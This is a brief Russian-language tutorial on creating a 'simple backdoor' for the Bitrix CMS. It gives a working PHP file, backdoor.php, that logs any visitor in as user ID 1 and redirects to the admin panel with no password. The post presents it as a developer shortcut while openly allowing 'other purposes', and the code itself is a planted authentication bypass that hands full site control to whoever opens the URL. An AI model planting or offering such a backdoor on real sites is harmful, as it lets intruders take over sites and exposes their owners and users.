Bitrix: Простой бекдор на битриксе.

В данной очень краткой заметке рассмотрен вопрос: Как сделать простой бекдор на битриксе. Это может понадобится, например, на время разработки, когда разработчику не очень удобно каждый раз вводить свой логин и пароль. Либо же, для каких-либо других целей.

Итак, для того, чтобы сделать backdoor — нам, в любом случае, понадобится:

  1. Либо доступ в админку
  2. Либо доступ по фтп
  3. Либо доступ на сервер

То есть, любой вариант, где мы можем либо редактировать, либо залить на сервер php-файл.

Предположим, что доступ у нас есть. Что нужно делать далее?

Собственно, весь «алгоритм» состоит из двух шагов:

Шаг 1. PHP-файл со скриптом авторизации

Создаем в корне сайта php-файл с произвольным названием, пусть это будет backdoor.php. Внутри сайта пишем:

<?
require $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php";
$USER->Authorize('1');
LocalRedirect('/bitrix/admin/');
?>

Что делает данный скрипт?

  • Подключаем служебную часть пролога с необходимыми функциями
  • Вызываем функцию авторизации под пользователем с ID = 1
  • Производим редирект в административную панель

Собственно, весь бекдор.

Шаг 2. Авторизация

Чтобы авторизоваться на сайте через данный файл, нужно открыть данную страницу в браузере. Например, http://адрес-сайта.рф/backdoor.php

И после отработки скрипта попадаем в админку.

Конечно, стоит заметить, что после завершения работ на сайте этот файл лучше потереть, дабы кто-нибудь другой не наткнулся на него.